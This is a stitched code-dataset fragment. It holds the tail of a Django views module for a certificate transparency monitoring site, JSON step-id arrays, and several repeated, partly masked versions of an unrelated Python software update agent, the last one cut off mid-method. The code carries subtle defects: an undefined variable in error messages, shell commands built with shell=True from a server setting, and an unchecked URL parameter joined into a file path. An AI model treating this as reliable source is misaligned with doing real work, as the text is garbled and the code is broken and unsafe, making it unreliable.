SubscribeUnsubscribeForm()\n \n with connection.cursor() as c:\n c.execute(\"SELECT NAME_TYPE, NAME_VALUE FROM metadata\")\n rows = c.fetchall()\n for row in rows:\n metadata[row[0]] = row[1]\n\n return render(request, 'observer/index.html',\n {\n 'total_certs': metadata['number_of_certs'],\n 'total_ca': metadata['number_of_cas'],\n 'total_logs': CtLog.objects.count(),\n 'active_certs': metadata['number_of_active_certs'],\n 'expired_certs': metadata['number_of_expired_certs'],\n 'revoked_certs': metadata['number_of_revoked_certs'],\n 'misissued_certs': metadata['number_of_misissued_certs'],\n 'behaving_cas' : metadata['number_of_correctly_behaving_cas'],\n 'interesting_cas' : metadata['number_of_interesting_cas'],\n 'biggest_log' : metadata['number_of_certs_in_biggest_log'],\n 'biggest_log_name' : CtLog.objects.get(id=metadata['biggest_log_id']).name,\n 'smallest_log' : metadata['number_of_certs_in_smallest_log'],\n 'uptime_days': (timezone.now().date()-datetime.date(2015,10,14)).days, #TODO\n 'messages' : messages,\n 'subscribeform' : subscribeform\n }\n )\n\ndef search(request):\n term = request.GET.get(\"term\",\"\")\n\n #found_ca = Ca.objects.filter(name__icontains=term)\n #found_cn_dnsname = Certificate.objects.raw(\"SELECT DISTINCT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, x509_notBefore(CERTIFICATE) FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE (NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE)) LIKE reverse(lower(%s))) OR (NAME_TYPE='commonName' AND reverse(lower(NAME_VALUE)) LIKE reverse(lower(%s)))\n #ORDER BY x509_notBefore(CERTIFICATE) DESC\", [term, term])\n\n return render(request, 'observer/search.html',\n {\n 'term' : term\n #'found_ca' : found_ca,\n #'found_cn_dnsname' : found_cn_dnsname\n }\n )\n\ndef caall(request, page=None): #VIEW FOR CAs\n \n if(page==None):\n return HttpResponsePermanentRedirect(\"all/1\")\n \n\n page = int(page)\n\n list_of_certs = []\n \n filtered_qs = CaFilter(\n request.GET, \n queryset=Ca.objects.all().order_by('common_name')\n )\n\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n \n return render(request, 'observer/cas.html',\n {\n 'list_of_ca': list_of_certs, \n 'filter': filtered_qs#Ca.objects.annotate(num_certs=Count('certificate')).order_by('-num_certs'),\n }\n )\n\ndef certall(request, page=None, ae=None, issuer_ca=None): #VIEW FOR Certificates->ALL\n\n if(page==None):\n return HttpResponsePermanentRedirect(\"all/1\")\n\n ae = request.GET.get(\"algorithm\")\n issuer_ca = request.GET.get(\"issuer_ca\")\n date_notbefore = request.GET.get(\"date_notbefore\")\n date_notbefore_gte = request.GET.get(\"date_notbefore_gte\")\n is_active = request.GET.get(\"is_active\")\n date_notafter = request.GET.get(\"date_notafter\")\n date_notafter_lte = request.GET.get(\"date_notafter_lte\")\n \n page = int(page)\n\n list_of_certs = []\n\n \n\n filtered_qs = CertFilter(\n request.GET, \n queryset=MetadataCountQuerySet(Certificate.objects.all().order_by('-id'), 'certificate')\n )\n \n\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n\n\n \n #Alternative filter solution for better performance\n #https://localhost/cert/all/1?issuer_ca=merge&date_notbefore=&date_notbefore_gte=&is_active=&date_notafter=&date_notafter_lte=\n \n query = FastCountQuerySet(Certificate.objects.all().order_by('-id'), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n \n if(is_active == \"1\" or is_active == \"\" or is_active == None):\n if(issuer_ca != None and (is_active == None or is_active == \"\")):\n query = FastCountQuerySet(Certificate.objects.filter(issuer_ca__common_name__contains = issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n \n if(is_active != None and (issuer_ca == None or issuer_ca == \"\")):\n query = FastCountQuerySet(Certificate.objects.filter(not_before__lte=timezone.now(), not_after__gte=timezone.now()), 'certificate')\n \n if(issuer_ca == \"\" and is_active == \"\"):\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n \n if(is_active != None and issuer_ca != None ): \n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains = issuer_ca,\n not_before__lte=timezone.now(), not_after__gte=timezone.now(), ), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n \n if(is_active == \"0\" or is_active == \"\" or is_active == None):\n if(issuer_ca != None and (is_active == None or is_active == \"\")):\n query = FastCountQuerySet(Certificate.objects.filter(issuer_ca__common_name__contains = issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n \n if(is_active != None and (issuer_ca == None or issuer_ca == \"\")):\n query = FastCountQuerySet(Certificate.objects.filter(not_after__lte=datetime.date.today()), 'certificate')\n \n if(issuer_ca == \"\" and is_active == \"\"):\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n \n if(is_active != None and issuer_ca != None ): \n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains = issuer_ca,\n not_after__lte=datetime.date.today() ), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n \n \n ####################################################\n \n\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n \n #if(ae != None):\n #list_of_certs = Certificate.objects.raw(\"SELECT * FROM certificate WHERE SIGNATURE_ALGORITHM=%s\", [ae])\n \n \n return render(request, 'observer/certs.html',\n {\n 'list_of_certs': list_of_certs, \n 'filter': filtered_qs\n }\n )\n\ndef certactive(request, page=None):\n\n if(page==None):\n return HttpResponsePermanentRedirect(\"active/1\")\n\n page = int(page)\n\n list_of_certs = []\n\n paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(not_before__lte=timezone.now(), not_after__gte=timezone.now()), 'number_of_active_certs'), ITEMS_PER_PAGE)\n if(page in paginator.page_range):\n list_of_certs = paginator.page(page)\n\n return render(request, 'observer/certs.html',\n {\n 'list_of_certs': list_of_certs\n }\n )\n\ndef certexpired(request, page=None, order=None):\n if(page==None):\n return HttpResponsePermanentRedirect(\"expired/1\")\n\n\n page = int(page)\n\n list_of_certs = []\n\n paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(not_after__lt=timezone.now()), 'number_of_expired_certs'), ITEMS_PER_PAGE)\n# paginator = Paginator(Certificate.objects.filter(not_after__lt=timezone.now()), ITEMS_PER_PAGE)\n if(page in paginator.page_range):\n list_of_certs = paginator.page(page)\n\n return render(request, 'observer/certs.html',\n {\n 'list_of_certs': list_of_certs\n }\n )\ndef certrevoked(request, page=None):\n if(page==None):\n return HttpResponsePermanentRedirect(\"revoked/1\")\n\n page = int(page)\n\n list_of_certs = []\n\n paginator = Paginator(Certificate.objects.filter(id__in=RevokedCertificate.objects.all().values('certificate')), ITEMS_PER_PAGE)\n if(page in paginator.page_range):\n list_of_certs = paginator.page(page)\n\n return render(request, 'observer/certs.html',\n {\n 'list_of_certs': list_of_certs\n }\n )\n\ndef certs_by_log(request, log_id, page=None):\n if(page==None):\n return HttpResponsePermanentRedirect(\"./1\")\n\n page = int(page)\n log_id = int(log_id)\n \n list_of_certs = []\n \n paginator = Paginator(CtLogEntry.objects.filter(ct_log=log_id), ITEMS_PER_PAGE)\n if(page in paginator.page_range):\n list_of_entries = paginator.page(page)\n \n\n return render(request, 'observer/log_certs.html',\n {\n 'log': get_object_or_404(CtLog, pk=log_id),\n 'list_of_entries' : list_of_entries\n }\n )\n\ndef certs_by_ca(request, ca_id, page=None):\n\n if(page==None):\n return HttpResponsePermanentRedirect(\"certificates/1\")\n\n page = int(page)\n ca_id = int(ca_id)\n\n list_of_certs = []\n \n \n \n filtered_qs = CertFilter(\n request.GET, \n queryset=Certificate.objects.filter(issuer_ca=ca_id)\n )\n\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n \n \n return render(request, 'observer/certs.html',\n {\n 'list_of_certs': list_of_certs, \n 'filter': filtered_qs\n })\n \n \n\n# paginator = Paginator(Certificate.objects.filter(issuer_ca=ca_id), ITEMS_PER_PAGE)\n# if(page in paginator.page_range):\n# list_of_certs = paginator.page(page)\n\n# return render(request, 'observer/certs.html',\n# {\n# 'list_of_certs': list_of_certs\n# }\n# )\n\ndef list_cn_certs(request, cn):\n\n field_id = 'common name'\n expression = cn\n\n list_of_certs = Certificate.objects.raw(\"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='commonName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\", [cn])\n #list_of_certs = Certificate.objects.filter(certificate__common_name=cn).order_by('not_before')\n \n \n issues = issuefinder.get_all_issues(list(list_of_certs))\n #issues = issuefinder.get_first_certificates(list_of_certs)\n\n return render(request, 'observer/history.html',\n {\n 'field_id': field_id,\n 'expression': expression,\n 'list_of_certs': list_of_certs,\n 'issues':issues\n }\n )\n\ndef list_dnsname_certs(request, dnsname):\n\n field_id = 'dnsname'\n expression = dnsname\n\n list_of_certs = Certificate.objects.raw(\"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\", [dnsname])\n \n issues = issuefinder.get_all_issues(list(list_of_certs))\n \n return render(request, 'observer/history.html',\n {\n 'field_id': field_id,\n 'expression': expression,\n 'list_of_certs': list_of_certs,\n 'issues':issues\n }\n )\n\ndef log(request): #LOG VIEW\n return render(request, 'observer/logs.html',\n {\n #'list_of_logs': CtLog.objects.all().annotate(entries=Count('ctlogentry')).order_by('latest_entry_id')\n 'list_of_logs': CtLog.objects.all().order_by('-is_active','-latest_entry_id','name')\n }\n )\n\ndef cadetail(request,ca_id):\n ca = get_object_or_404(Ca, pk=ca_id)\n \n #counting number of issued CA's:\n number_of_issued_ca = Certificate.objects.filter(issuer_ca=ca_id).count()\n \n return render(request, 'observer/cadetail.html', { 'ca' : ca, 'number_of_issued_ca': number_of_issued_ca})\n\n\ndef certdetail(request,cert_id=None,cert_sha256=None):\n if cert_sha256:\n cert_sha256_bin = cert_sha256.decode('hex') #Does not work on python3\n cert = get_object_or_404(Certificate, certificate__sha256=cert_sha256_bin)\n if cert_id:\n cert = get_object_or_404(Certificate, pk=cert_id)\n cacert = CaCertificate.objects.filter(certificate_id=cert_id).first()\n digest_sha256 = str(cert.get_digest_sha256()).replace(':','').lower()[2:-1]\n\n #TODO\n #Certificate.objects.raw(\"select (select count(*) from certificate WHERE x509_keySize(certificate) = %s)*100/cast(COUNT(*) as float) as percentage, 0 as id FROM certificate;\",\n #[cert.get_x509_data().get_pubkey().bits()])\n\n #return render(request, 'observer/certdetail.html', { 'certificate' : cert, 'ca_certificate' : cacert, 'keysize_distribution': round(keysize_distribution[0].percentage,2)})\n return render(request, 'observer/certdetail.html', { 'certificate' : cert, 'ca_certificate' : cacert, 'keysize_distribution': 'TODO', 'digest_sha256':digest_sha256})\n\ndef certraw(request,cert_id):\n cert = get_object_or_404(Certificate, pk=cert_id)\n \n response = HttpResponse(cert.certificate, content_type='application/octet-stream')\n response['Content-Disposition'] = 'attachment; filename=\"certificate_{}.crt'.format(cert_id)\n return response\n\ndef logdetail(request,log_id):\n log = get_object_or_404(CtLog, pk=log_id)\n \n number_of_issued_ca = CtLogEntry.objects.filter(ct_log=log_id).count()\n return render(request, 'observer/logdetail.html', { 'log' : log, 'number_of_issued_ca' : number_of_issued_ca})\n\ndef flag(request, flag_id):\n try:\n with open(os.path.join(BASE_DIR, \"static/flags/png/{0}.png\".format(flag_id.lower())), \"rb\") as f:\n return HttpResponse(f.read(), content_type=\"image/png\")\n except IOError:\n with open(os.path.join(BASE_DIR, \"static/flags/png/-.png\"), \"rb\") as f:\n return HttpResponse(f.read(), content_type=\"image/png\")\n\ndef imprint(request):\n return render(request, 'observer/imprint.html')\n \ndef issues(request):\n return render(request, 'observer/issues.html')\n \ndef status(request):\n status = {'analyzer':{'lastrun':0}, 'monitor':{'lastrun':0}, 'msg':'ok'}\n try:\n with open('/static/data/status.json', 'r') as f:\n status = json.load(f)\n \n status['analyzer']['lastrun'] = datetime.datetime.fromtimestamp(status['analyzer']['lastrun'])\n status['monitor']['lastrun'] = datetime.datetime.fromtimestamp(status['monitor']['lastrun'])\n except Exception as e:\n status['msg'] = \"Could not load status file.\"+str(e)\n \n \n return render(request, 'observer/status.html', {'status':status})\n\n\ndef certcheck(request):\n \n if request.method == 'POST':\n \n serial_post = request.POST['serial']\n \n sqlQuery = \"\"\"SELECT id FROM certificate WHERE serial=%s\"\"\"\n sqlQuery_commonName = \"\"\"SELECT * FROM ca WHERE \"\"\"\n \n \n current_time = str(datetime.datetime.now())\n \n serial_int = int(serial_post, 16)\n serial = serial_int.to_bytes((serial_int.bit_length() + 15) // 8, 'big', signed=True) or b'\\0'\n sqlData = (psycopg2.Binary(serial),)\n \n found_serial = Certificate.objects.raw(sqlQuery, sqlData)\n \n if(found_serial):\n return HttpResponse(found_serial)\n else:\n return HttpResponse(\"none\")\n \n\n return render(request, 'observer/checkserial.html', {})\n",
"step-ids": [
25,
26,
28,
29,
35
]
}
|
[
25,
26,
28,
29,
35
] |
<|reserved_special_token_0|>
class GregerUpdateAgent(Thread):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@property
def localRevisionRecord(self):
"""
Get local revision record (.gcm)
"""
localLog = logging.getLogger(self.logPath + '.localRevisionRecord')
localLog.debug('Getting local revision record...')
revisionRecordPath = self.localRevisionRecordPath
localLog.debug('Attemption to get record from file...')
try:
with open(revisionRecordPath, 'r') as f:
localRecord = f.read()
localLog.debug('Local revision record: ' + str(localRecord))
except Exception as e:
self.log.warning('Failed to open file! - ' + str(e))
self.localRevisionRecord = 0
localRecord = self.localRevisionRecord
return localRecord
<|reserved_special_token_0|>
def getSoftwareInfo(self, rev='HEAD'):
"""
Retrieve information about a revision available on server.
"""
localLog = logging.getLogger(self.logPath + '.getSoftwareInfo')
localLog.debug('Attempting to retrieve software revision info...')
if 'guaSWSource' in GregerDatabase.settings:
guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
else:
self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')
return
moduleReturn = {'revision': '', 'revision_SHA': '',
'revision_author': '', 'revision_date': '', 'revision_comment': ''}
localLog.debug('Attempting to retrieve info from server... ' +
guaSWServerURI)
pCmd = 'svn proplist -v -R --revprop -r ' + rev
pCmd += ' ' + guaSWServerURI
localLog.debug(pCmd)
try:
p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)
output, err = p.communicate()
outputList = output.splitlines()[1:]
outputList = [elem.strip() for elem in outputList]
revStr = output.splitlines()[0]
revStr = revStr.split()[-1]
moduleReturn['revision'] = revStr[:-1]
localLog.debug('Revision: ' + revStr[:-1])
shaStr = outputList[outputList.index('git-commit') + 1]
moduleReturn['revision_SHA'] = shaStr
localLog.debug('Revision SHA: ' + shaStr)
authorStr = outputList[outputList.index('svn:author') + 1]
moduleReturn['revision_author'] = authorStr
localLog.debug('Revision author: ' + authorStr)
dateStr = outputList[outputList.index('svn:date') + 1]
moduleReturn['revision_date'] = dateStr
localLog.debug('Revision date: ' + dateStr)
commentStr = outputList[outputList.index('svn:log') + 1].strip()
moduleReturn['revision_comment'] = commentStr
localLog.debug('Revision Comment: ' + commentStr)
if err is not None:
localLog.debug('Error message: ' + str(err))
except Exception as e:
self.log.error('Oops! Something went wrong - ' + str(e))
return moduleReturn
def updateSoftware(self, swRev='HEAD'):
"""
Get and updating software from server
"""
localLog = logging.getLogger(self.logPath + '.updateSoftware')
localLog.debug('Getting software revision ' + str(swRev) +
' from server and updating local client...')
localLog.debug('Constructing target path for new software...')
targetRoot = self._location
targetDir = 'gcm'
targetPath = os.path.join(targetRoot, targetDir)
localLog.debug('Target path: ' + targetPath)
localLog.debug('Retrieving relevant parameters from server...')
if 'guaSWSource' in GregerDatabase.settings:
guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
localLog.debug('Parameter: (guaSWSource) ' + guaSWServerURI)
else:
self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')
return
localLog.debug('Getting software files from server...')
pCmd = 'svn export --force -r ' + str(swRev)
pCmd += ' ' + guaSWServerURI
pCmd += ' ' + targetPath
localLog.debug(pCmd)
try:
p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)
output, err = p.communicate()
if err is not None:
self.log.warning('Error message: ' + str(err))
else:
self.log.info('Download successful!')
for line in output.splitlines():
self.log.info(line)
except Exception as e:
self.log.error('Oops! Something went wrong - ' + str(e))
localLog.debug('Reading downloaded revision from "' + output.
splitlines()[-1] + '"...')
revText = output.splitlines()[-1].split()[-1][:-1]
localLog.debug('Downloaded Revision: ' + revText)
self.localRevisionRecord = revText
localLog.debug('Listing downloaded files...')
downloadedFiles = []
for row in output.splitlines()[:-1]:
file = os.path.join(targetRoot, [t.strip() for t in row.split()][1]
)
downloadedFiles.append(file)
localLog.debug('File: ' + file)
self.log.debug('Getting all files in local directory (after update)...'
)
allFiles = []
for r, d, f in os.walk(targetPath):
for file in f:
allFiles.append(os.path.join(r, file))
localLog.debug('File: ' + allFiles[-1])
for dir in d:
allFiles.append(os.path.join(r, dir))
localLog.debug('Dir: ' + allFiles[-1])
self.log.info(
'Identifying old files to remove (<new_files> - <all_files>)...')
diffFiles = list(set(allFiles) - set(downloadedFiles))
for file in diffFiles:
self.log.info('Removing: ' + file)
try:
if os.path.isfile(file):
os.unlink(file)
elif os.path.isdir(file):
shutil.rmtree(file)
except Exception as e:
self.log.warning('Oops! Something went wrong! - ' + str(e))
self.log.debug('Re-getting all files in local directory...')
allFiles = []
for r, d, f in os.walk(targetPath):
for file in f:
allFiles.append(os.path.join(r, file))
self.log.debug('File: ' + os.path.join(r, file))
for dir in d:
allFiles.append(os.path.join(r, dir))
self.log.debug('Dir: ' + os.path.join(r, file))
def run(self):
"""
Run Greger Update Agent.
"""
localLog = logging.getLogger(self.logPath + '.run')
self.log.info('Starting Greger Update Agent (GUA)...')
localLog.debug('Wait for Greger Client Module to start...')
self.ready.wait()
allThreads = {}
for thr in enumerate():
localLog.debug(thr.name + ' ' + thr.__class__.__name__ + ' active!'
)
allThreads.update({thr.__class__.__name__: thr})
if thr.__class__.__name__ == 'GregerClientModule':
localLog.debug('Greger Client Module thread found! ' +
allThreads['GregerClientModule'].name)
loopCount = 0
while not self.stopExecution.is_set():
loopCount += 1
localLog.debug('Checking for updates (' + str(loopCount) + ')...')
localLog.debug('Getting local revision record...')
localRevision = self.localRevisionRecord
localLog.debug('Getting latest software info...')
softwareInfo = self.getSoftwareInfo()
self.log.info('Revision check done! (' + str(localRevision) + ')')
if int(localRevision) == int(softwareInfo['revision']):
self.log.info('No new revision found.')
else:
self.log.info('New revision found!')
localLog.debug('Attempting to update software...')
self.updateSoftware()
localLog.debug(
'Attempting to update server with software info...')
allThreads['GregerDatabase'].update('about', softwareInfo)
self.log.info(
'Attempting to stop all exection before restarting...')
allThreads['GregerClientModule'].stopAll(GUA=True)
self.log.info('Attemption to restart application...')
restart_program()
if 'guaCheckUpdateDelay' in GregerDatabase.settings:
delayTime = GregerDatabase.settings['guaCheckUpdateDelay'][
'value']
else:
delayTime = 10
self.log.warning('Settings not defined! (using default=10)')
self.log.info('Waiting ' + str(delayTime) + 's...')
self.stopExecution.wait(delayTime)
self.log.info('Greger Update Agent (GUA) execution stopped!')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GregerUpdateAgent(Thread):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@property
def localRevisionRecord(self):
"""
Get local revision record (.gcm)
"""
localLog = logging.getLogger(self.logPath + '.localRevisionRecord')
localLog.debug('Getting local revision record...')
revisionRecordPath = self.localRevisionRecordPath
localLog.debug('Attemption to get record from file...')
try:
with open(revisionRecordPath, 'r') as f:
localRecord = f.read()
localLog.debug('Local revision record: ' + str(localRecord))
except Exception as e:
self.log.warning('Failed to open file! - ' + str(e))
self.localRevisionRecord = 0
localRecord = self.localRevisionRecord
return localRecord
@localRevisionRecord.setter
def localRevisionRecord(self, newRevision):
"""
Set local revision record (.gcm)
"""
localLog = logging.getLogger(self.logPath + '.localRevisionRecord')
localLog.debug('Setting local revision record (.gcm) to ' + str(
newRevision) + '...')
revisionRecordPath = self.localRevisionRecordPath
localLog.debug('Attemption to write "' + str(newRevision) +
'" to file...')
with open(revisionRecordPath, 'w') as f:
f.write(str(newRevision))
self.log.info('Local revision record set: ' + str(newRevision))
def getSoftwareInfo(self, rev='HEAD'):
"""
Retrieve information about a revision available on server.
"""
localLog = logging.getLogger(self.logPath + '.getSoftwareInfo')
localLog.debug('Attempting to retrieve software revision info...')
if 'guaSWSource' in GregerDatabase.settings:
guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
else:
self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')
return
moduleReturn = {'revision': '', 'revision_SHA': '',
'revision_author': '', 'revision_date': '', 'revision_comment': ''}
localLog.debug('Attempting to retrieve info from server... ' +
guaSWServerURI)
pCmd = 'svn proplist -v -R --revprop -r ' + rev
pCmd += ' ' + guaSWServerURI
localLog.debug(pCmd)
try:
p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)
output, err = p.communicate()
outputList = output.splitlines()[1:]
outputList = [elem.strip() for elem in outputList]
revStr = output.splitlines()[0]
revStr = revStr.split()[-1]
moduleReturn['revision'] = revStr[:-1]
localLog.debug('Revision: ' + revStr[:-1])
shaStr = outputList[outputList.index('git-commit') + 1]
moduleReturn['revision_SHA'] = shaStr
localLog.debug('Revision SHA: ' + shaStr)
authorStr = outputList[outputList.index('svn:author') + 1]
moduleReturn['revision_author'] = authorStr
localLog.debug('Revision author: ' + authorStr)
dateStr = outputList[outputList.index('svn:date') + 1]
moduleReturn['revision_date'] = dateStr
localLog.debug('Revision date: ' + dateStr)
commentStr = outputList[outputList.index('svn:log') + 1].strip()
moduleReturn['revision_comment'] = commentStr
localLog.debug('Revision Comment: ' + commentStr)
if err is not None:
localLog.debug('Error message: ' + str(err))
except Exception as e:
self.log.error('Oops! Something went wrong - ' + str(e))
return moduleReturn
def updateSoftware(self, swRev='HEAD'):
"""
Get and updating software from server
"""
localLog = logging.getLogger(self.logPath + '.updateSoftware')
localLog.debug('Getting software revision ' + str(swRev) +
' from server and updating local client...')
localLog.debug('Constructing target path for new software...')
targetRoot = self._location
targetDir = 'gcm'
targetPath = os.path.join(targetRoot, targetDir)
localLog.debug('Target path: ' + targetPath)
localLog.debug('Retrieving relevant parameters from server...')
if 'guaSWSource' in GregerDatabase.settings:
guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
localLog.debug('Parameter: (guaSWSource) ' + guaSWServerURI)
else:
self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')
return
localLog.debug('Getting software files from server...')
pCmd = 'svn export --force -r ' + str(swRev)
pCmd += ' ' + guaSWServerURI
pCmd += ' ' + targetPath
localLog.debug(pCmd)
try:
p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)
output, err = p.communicate()
if err is not None:
self.log.warning('Error message: ' + str(err))
else:
self.log.info('Download successful!')
for line in output.splitlines():
self.log.info(line)
except Exception as e:
self.log.error('Oops! Something went wrong - ' + str(e))
localLog.debug('Reading downloaded revision from "' + output.
splitlines()[-1] + '"...')
revText = output.splitlines()[-1].split()[-1][:-1]
localLog.debug('Downloaded Revision: ' + revText)
self.localRevisionRecord = revText
localLog.debug('Listing downloaded files...')
downloadedFiles = []
for row in output.splitlines()[:-1]:
file = os.path.join(targetRoot, [t.strip() for t in row.split()][1]
)
downloadedFiles.append(file)
localLog.debug('File: ' + file)
self.log.debug('Getting all files in local directory (after update)...'
)
allFiles = []
for r, d, f in os.walk(targetPath):
for file in f:
allFiles.append(os.path.join(r, file))
localLog.debug('File: ' + allFiles[-1])
for dir in d:
allFiles.append(os.path.join(r, dir))
localLog.debug('Dir: ' + allFiles[-1])
self.log.info(
'Identifying old files to remove (<new_files> - <all_files>)...')
diffFiles = list(set(allFiles) - set(downloadedFiles))
for file in diffFiles:
self.log.info('Removing: ' + file)
try:
if os.path.isfile(file):
os.unlink(file)
elif os.path.isdir(file):
shutil.rmtree(file)
except Exception as e:
self.log.warning('Oops! Something went wrong! - ' + str(e))
self.log.debug('Re-getting all files in local directory...')
allFiles = []
for r, d, f in os.walk(targetPath):
for file in f:
allFiles.append(os.path.join(r, file))
self.log.debug('File: ' + os.path.join(r, file))
for dir in d:
allFiles.append(os.path.join(r, dir))
self.log.debug('Dir: ' + os.path.join(r, file))
def run(self):
"""
Run Greger Update Agent.
"""
localLog = logging.getLogger(self.logPath + '.run')
self.log.info('Starting Greger Update Agent (GUA)...')
localLog.debug('Wait for Greger Client Module to start...')
self.ready.wait()
allThreads = {}
for thr in enumerate():
localLog.debug(thr.name + ' ' + thr.__class__.__name__ + ' active!'
)
allThreads.update({thr.__class__.__name__: thr})
if thr.__class__.__name__ == 'GregerClientModule':
localLog.debug('Greger Client Module thread found! ' +
allThreads['GregerClientModule'].name)
loopCount = 0
while not self.stopExecution.is_set():
loopCount += 1
localLog.debug('Checking for updates (' + str(loopCount) + ')...')
localLog.debug('Getting local revision record...')
localRevision = self.localRevisionRecord
localLog.debug('Getting latest software info...')
softwareInfo = self.getSoftwareInfo()
self.log.info('Revision check done! (' + str(localRevision) + ')')
if int(localRevision) == int(softwareInfo['revision']):
self.log.info('No new revision found.')
else:
self.log.info('New revision found!')
localLog.debug('Attempting to update software...')
self.updateSoftware()
localLog.debug(
'Attempting to update server with software info...')
allThreads['GregerDatabase'].update('about', softwareInfo)
self.log.info(
'Attempting to stop all exection before restarting...')
allThreads['GregerClientModule'].stopAll(GUA=True)
self.log.info('Attemption to restart application...')
restart_program()
if 'guaCheckUpdateDelay' in GregerDatabase.settings:
delayTime = GregerDatabase.settings['guaCheckUpdateDelay'][
'value']
else:
delayTime = 10
self.log.warning('Settings not defined! (using default=10)')
self.log.info('Waiting ' + str(delayTime) + 's...')
self.stopExecution.wait(delayTime)
self.log.info('Greger Update Agent (GUA) execution stopped!')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GregerUpdateAgent(Thread):
<|reserved_special_token_0|>
def __init__(self, ready=None):
"""
Initialize the main class
"""
Thread.__init__(self)
self.ready = ready
self.logPath = 'root.GUA'
self.log = logging.getLogger(self.logPath)
localLog = logging.getLogger(self.logPath + '.__init__')
localLog.debug('Initiating Greger Update Agent (GUA)...')
self.stopExecution = Event()
self._location = os.path.abspath(__file__)
self._location = self._location[:-15]
localLog.debug('Local path: ' + self._location)
localLog.debug('Getting configuration parameters from file...')
config = getLocalConfig()
self.localRevisionRecordPath = config.get('greger_update_agent',
'local_revision_path')
localLog.debug('Parameter: (localRevisionRecordPath) ' + self.
localRevisionRecordPath)
self.log.info('Greger Update Agent (GUA) successfully initiated!')
@property
def localRevisionRecord(self):
"""
Get local revision record (.gcm)
"""
localLog = logging.getLogger(self.logPath + '.localRevisionRecord')
localLog.debug('Getting local revision record...')
revisionRecordPath = self.localRevisionRecordPath
localLog.debug('Attemption to get record from file...')
try:
with open(revisionRecordPath, 'r') as f:
localRecord = f.read()
localLog.debug('Local revision record: ' + str(localRecord))
except Exception as e:
self.log.warning('Failed to open file! - ' + str(e))
self.localRevisionRecord = 0
localRecord = self.localRevisionRecord
return localRecord
@localRevisionRecord.setter
def localRevisionRecord(self, newRevision):
"""
Set local revision record (.gcm)
"""
localLog = logging.getLogger(self.logPath + '.localRevisionRecord')
localLog.debug('Setting local revision record (.gcm) to ' + str(
newRevision) + '...')
revisionRecordPath = self.localRevisionRecordPath
localLog.debug('Attemption to write "' + str(newRevision) +
'" to file...')
with open(revisionRecordPath, 'w') as f:
f.write(str(newRevision))
self.log.info('Local revision record set: ' + str(newRevision))
def getSoftwareInfo(self, rev='HEAD'):
"""
Retrieve information about a revision available on server.
"""
localLog = logging.getLogger(self.logPath + '.getSoftwareInfo')
localLog.debug('Attempting to retrieve software revision info...')
if 'guaSWSource' in GregerDatabase.settings:
guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
else:
self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')
return
moduleReturn = {'revision': '', 'revision_SHA': '',
'revision_author': '', 'revision_date': '', 'revision_comment': ''}
localLog.debug('Attempting to retrieve info from server... ' +
guaSWServerURI)
pCmd = 'svn proplist -v -R --revprop -r ' + rev
pCmd += ' ' + guaSWServerURI
localLog.debug(pCmd)
try:
p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)
output, err = p.communicate()
outputList = output.splitlines()[1:]
outputList = [elem.strip() for elem in outputList]
revStr = output.splitlines()[0]
revStr = revStr.split()[-1]
moduleReturn['revision'] = revStr[:-1]
localLog.debug('Revision: ' + revStr[:-1])
shaStr = outputList[outputList.index('git-commit') + 1]
moduleReturn['revision_SHA'] = shaStr
localLog.debug('Revision SHA: ' + shaStr)
authorStr = outputList[outputList.index('svn:author') + 1]
